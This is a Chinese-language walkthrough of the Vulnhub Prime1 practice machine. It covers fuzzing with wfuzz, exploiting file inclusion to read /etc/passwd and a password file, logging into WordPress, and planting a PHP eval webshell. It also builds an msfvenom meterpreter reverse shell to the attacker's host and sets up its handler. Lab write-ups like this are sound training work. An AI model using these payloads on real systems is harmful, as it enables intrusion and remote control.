Vulnhub Prime1_综合

明确：《中华人民共和国网络安全法 》

Description

This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.

This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox's machines are designed.

So you have a target to get root flag as well as user flag. If stuck on a point some help are given at a level of enumeration.

ubuntu 靶机，回去扫网段

<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body></html>

/dev

/index.php

/index.php/login/

/wordpress/wp-login.php

/wordpress/

/dev

hello,now you are at level 0 stage.In real life pentesting we should use our tools to dig on a web very hard.Happy hacking.

/index.php

/index.php/login/

/wordpress/wp-login.php

/wordpress/

droopescan 扫不了登录页面，可能被防了

wpscan 也扫不出用户名，ssh 爆破 admin 也被限制，回头看看，第 0 阶段，需要挖更多的东西，只能是目录扫描没有扫出来的文件了

dirb -X 扫 /dev 下的敏感文件

dirb http://192.168.37.133 -X .php,.txt,.py,.zip

除了原扫出的 index,php 和 image.php 多扫出来了一个 secret，从内容看是我们要找的东西

Looks like you have got some secrets.Ok I just want to do some help to you. Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web//see the location.txt and you will get your next move//

从话中我们知道使用 fuzz 模糊测试在某个页面找漏洞参数，burp suite 或者 wfuzz，话中链接就是 wfuzz 的使用，最后提示看 location.txt ，但是每个页面都找不到，应该是接下来 wfuzz 使用的参数内容，就像 DC-9 中我们使用 wfuzz 的流程一样

先找 php 页面，除去登录页面和图片页面，只剩下 /index.php，开始找参数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.133/index.php?FUZZ

响应响应行xL 响应单词数xW 响应字符xCh
加入 --hl (隐藏具有相同的 50 行数的响应)
同样有 --hc/hw

wfuzz --hw 12 -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.133/index.php?FUZZ

得到正确参数 file，文件包含漏洞，参数内容应该就是找不到的 location.txt

http://192.168.37.133/index.php?file=location.txt

Do something better

ok well Now you reah at the exact parameter

Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun.

在前面我们一共有两个 php 网页

index.php

image.php

使用参数 secrettier360 测两个网页

http://192.168.37.133/image.php?secrettier360

利用正确参数，使用文件包含漏洞先看 /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

可以看到 saket 的第五个域身份描述中有内容

saket:x:1001:1001:find password.txt file in my directory:/home/saket:

到其目录下拿 password.txt

?secrettier360=/home/saket/password.txt

follow_the_ippsec

这里我想直接 ssh，但是失败，被检测到了，不允许登录

有账号有秘密回去找那个登录框

错误，有问题，再试个 admin，也不行，账号可能有问题

wpscan --url http://192.168.37.133/wordpress/wp-login.php -e u

wpscan --url http://192.168.37.133/wordpress -e u

用 wpscan 重扫，扫出之前漏掉的用户，victor

/wordpress/ 中也可以看到唯一发表过的作者也是 victor

登录成功，直接先找可写入木马的地方，找到两个编辑器

??????主题编辑器(Theme Editor)

插件编辑器(Plugin Editor)

查看各个文件后发现只有 secret.php 左下角有 upload file，且有提示我们找到可写入文件

/* Ohh Finaly you got a writable file */

写入反弹命令后我们需要找到对应的 secret.php 执行，在右边可以看到有三个编辑主题

在我的 wordpress 中文件路径可以找到对应的主题路径

所以 secret.php 的路径应该是

/wordpress/wp-content/themes/twentynineteen/secret.php

注意这里的 Twenty Nineteen 对应的文件夹名应该是 twentynineteen

执行后发现这个反弹语句不行，使用一句话木马可以直接连上

<?php @eval($_REQUEST['Sherlock']); ?>

因为连蚁剑后不好操作，还是虚拟机好用，反弹也可以尽量避免 IP 的变动或者杀毒

用 msf 生成可利用反弹语句

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.128 lport=3333 -o shell.php

lhost 和 lport 为监听端

生成的反弹语句得用配套的 msf 监听，nc 不能监听

use exploit/multi/handler 使用侦听模块

set payload php/meterpreter/reverse_tcp 使用 payload

show options

set lhost 192.168.37.128 设置侦听端

set lport 3333

run